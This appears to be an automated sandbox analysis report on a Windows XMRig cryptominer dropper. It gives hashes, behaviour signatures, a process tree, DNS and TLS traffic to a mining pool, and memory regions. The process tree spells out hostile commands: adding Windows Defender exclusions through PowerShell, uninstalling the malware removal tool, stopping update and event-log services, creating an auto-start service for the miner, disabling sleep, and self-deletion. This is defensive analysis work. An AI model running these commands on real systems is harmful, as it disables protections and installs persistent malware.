Analysis

  • max time kernel
    98s
  • max time network
    31s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    02-08-2024 09:07

General

  • Target

    82da016d3d0560b26578da30cc962470N.exe

  • Size

    5.4MB

  • MD5

    82da016d3d0560b26578da30cc962470

  • SHA1

    299ec2a311a5d2984a2d1c710afdfc7ed91f8eed

  • SHA256

    99b86f4472f3b0b1b252e60be361cfbd7e428ee18d36df584446af823ea62b83

  • SHA512

    dc84e2d4395c2f4099a9c665f875728b143782ee649d5983c8b0029052b19f4e4f05d23a2eadc5fedcf867bec43c3def57f9ee44e8c1261a534728931a9a9688

  • SSDEEP

    98304:xRjPz9KDzUU8O5/B/LJ25E9SVh86sS3TRknQ3ss2MApp9meypA3cPDu7:xFKoU8O5/b2XViSjX310SeyGc7u7

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Stops running service(s) 4 TTPs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 13 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\82da016d3d0560b26578da30cc962470N.exe
    "C:\Users\Admin\AppData\Local\Temp\82da016d3d0560b26578da30cc962470N.exe"
    1⤵
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    PID:2472
    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2324
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1368
      • C:\Windows\system32\wusa.exe
        wusa /uninstall /kb:890830 /quiet /norestart
        3⤵
        • Drops file in Windows directory
        PID:2680
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      2⤵
      • Launches sc.exe
      PID:2656
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      2⤵
      • Launches sc.exe
      PID:2760
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      2⤵
      • Launches sc.exe
      PID:2652
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      2⤵
      • Launches sc.exe
      PID:1036
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      2⤵
      • Launches sc.exe
      PID:2984
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:1968
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:2564
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:2692
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:2696
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "JIOGRCSG"
      2⤵
      • Launches sc.exe
      PID:2572
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "JIOGRCSG" binpath= "C:\ProgramData\zvycwxhpsxqt\lutlgidagtja.exe" start= "auto"
      2⤵
      • Launches sc.exe
      PID:3020
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      2⤵
      • Launches sc.exe
      PID:3004
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "JIOGRCSG"
      2⤵
      • Launches sc.exe
      PID:988
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\82da016d3d0560b26578da30cc962470N.exe"
      2⤵
      • Deletes itself
      • Suspicious use of WriteProcessMemory
      PID:2504
      • C:\Windows\system32\choice.exe
        choice /C Y /N /D Y /T 3
        3⤵
          PID:2844
    • C:\ProgramData\zvycwxhpsxqt\lutlgidagtja.exe
      C:\ProgramData\zvycwxhpsxqt\lutlgidagtja.exe
      1⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2628
      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2856
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1836
        • C:\Windows\system32\wusa.exe
          wusa /uninstall /kb:890830 /quiet /norestart
          3⤵
          • Drops file in Windows directory
          PID:1480
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop UsoSvc
        2⤵
        • Launches sc.exe
        PID:3016
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        2⤵
        • Launches sc.exe
        PID:1460
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop wuauserv
        2⤵
        • Launches sc.exe
        PID:2232
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop bits
        2⤵
        • Launches sc.exe
        PID:432
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop dosvc
        2⤵
        • Launches sc.exe
        PID:2592
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:1272
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:1508
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:1620
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2060
      • C:\Windows\system32\conhost.exe
        C:\Windows\system32\conhost.exe
        2⤵
          PID:1880
        • C:\Windows\system32\nslookup.exe
          nslookup.exe
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1464

      Network

      • flag-us
        DNS
        us-zephyr.miningocean.org
        nslookup.exe
        Remote address:
        8.8.8.8:53
        Request
        us-zephyr.miningocean.org
        IN A
        Response
        us-zephyr.miningocean.org
        IN A
        15.204.240.197
        us-zephyr.miningocean.org
        IN A
        15.204.244.104
      • 15.204.240.197:5432
        us-zephyr.miningocean.org
        tls
        nslookup.exe
        1.3kB
        4.8kB
        7
        8
      • 8.8.8.8:53
        us-zephyr.miningocean.org
        dns
        nslookup.exe
        71 B
        103 B
        1
        1

        DNS Request

        us-zephyr.miningocean.org

        DNS Response

        15.204.240.197
        15.204.244.104

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • \ProgramData\zvycwxhpsxqt\lutlgidagtja.exe

        Filesize

        5.4MB

        MD5

        82da016d3d0560b26578da30cc962470

        SHA1

        299ec2a311a5d2984a2d1c710afdfc7ed91f8eed

        SHA256

        99b86f4472f3b0b1b252e60be361cfbd7e428ee18d36df584446af823ea62b83

        SHA512

        dc84e2d4395c2f4099a9c665f875728b143782ee649d5983c8b0029052b19f4e4f05d23a2eadc5fedcf867bec43c3def57f9ee44e8c1261a534728931a9a9688

      • memory/1464-37-0x0000000140000000-0x0000000140848000-memory.dmp

        Filesize

        8.3MB

      • memory/1464-40-0x0000000140000000-0x0000000140848000-memory.dmp

        Filesize

        8.3MB

      • memory/1464-39-0x0000000140000000-0x0000000140848000-memory.dmp

        Filesize

        8.3MB

      • memory/1464-35-0x0000000140000000-0x0000000140848000-memory.dmp

        Filesize

        8.3MB

      • memory/1464-36-0x0000000140000000-0x0000000140848000-memory.dmp

        Filesize

        8.3MB

      • memory/1464-31-0x0000000140000000-0x0000000140848000-memory.dmp

        Filesize

        8.3MB

      • memory/1464-38-0x0000000140000000-0x0000000140848000-memory.dmp

        Filesize

        8.3MB

      • memory/1464-33-0x0000000140000000-0x0000000140848000-memory.dmp

        Filesize

        8.3MB

      • memory/1464-32-0x0000000140000000-0x0000000140848000-memory.dmp

        Filesize

        8.3MB

      • memory/1464-34-0x00000000000B0000-0x00000000000D0000-memory.dmp

        Filesize

        128KB

      • memory/1464-27-0x0000000140000000-0x0000000140848000-memory.dmp

        Filesize

        8.3MB

      • memory/1464-28-0x0000000140000000-0x0000000140848000-memory.dmp

        Filesize

        8.3MB

      • memory/1464-29-0x0000000140000000-0x0000000140848000-memory.dmp

        Filesize

        8.3MB

      • memory/1464-30-0x0000000140000000-0x0000000140848000-memory.dmp

        Filesize

        8.3MB

      • memory/1880-20-0x0000000140000000-0x000000014000E000-memory.dmp

        Filesize

        56KB

      • memory/1880-18-0x0000000140000000-0x000000014000E000-memory.dmp

        Filesize

        56KB

      • memory/1880-25-0x0000000140000000-0x000000014000E000-memory.dmp

        Filesize

        56KB

      • memory/1880-19-0x0000000140000000-0x000000014000E000-memory.dmp

        Filesize

        56KB

      • memory/1880-21-0x0000000140000000-0x000000014000E000-memory.dmp

        Filesize

        56KB

      • memory/1880-22-0x0000000140000000-0x000000014000E000-memory.dmp

        Filesize

        56KB

      • memory/2324-10-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

        Filesize

        9.6MB

      • memory/2324-11-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

        Filesize

        9.6MB

      • memory/2324-4-0x000007FEF508E000-0x000007FEF508F000-memory.dmp

        Filesize

        4KB

      • memory/2324-9-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

        Filesize

        9.6MB

      • memory/2324-8-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

        Filesize

        9.6MB

      • memory/2324-5-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

        Filesize

        9.6MB

      • memory/2324-7-0x0000000001F10000-0x0000000001F18000-memory.dmp

        Filesize

        32KB

      • memory/2324-6-0x000000001B1D0000-0x000000001B4B2000-memory.dmp

        Filesize

        2.9MB

      • memory/2856-17-0x0000000000DF0000-0x0000000000DF8000-memory.dmp

        Filesize

        32KB

      • memory/2856-16-0x0000000019B90000-0x0000000019E72000-memory.dmp

        Filesize

        2.9MB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.